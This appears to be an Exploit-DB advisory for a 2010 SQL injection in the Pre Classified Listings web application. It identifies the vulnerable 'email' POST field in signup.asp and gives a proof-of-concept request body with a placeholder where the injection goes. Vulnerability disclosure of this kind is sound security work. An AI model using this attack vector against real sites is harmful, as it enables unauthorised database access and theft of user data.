Pre Classified Listings SQL Injection Vulnerability



EDB-ID: 11589 CVE: 2010-1369OSVDB-ID: 62635
Author: CruxPublished: 2010-02-27Verified: Not Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
=================================================================
[~] Pre Classified Listings Remote SQL Injection Vulnerability
=================================================================
##########################################################
## Author: Crux
## Homepage: http://hack-tech.com
## Date: 2-27-2010
## Software Link: http://www.preprojects.com/businesslisting.asp
## Version: N/A
##########################################################
[ SQLi ]
---------------------------------
// This vulnerability affects signup.asp
// Can be exploited VIA the POST variable 'email'
[#] Exploit / POC:
full_name=111-222-1933email@address.tst&email=${SQLINJECTIONHERE}&pass=test&ad
dress=3137%20Laguna%20Street&phone=555-666-0606&state=0&hide_email=on&url_add=
111-222-1933email@address.tst&Submit=SignUp&addit=start
=================================================================






Comments

No comments so far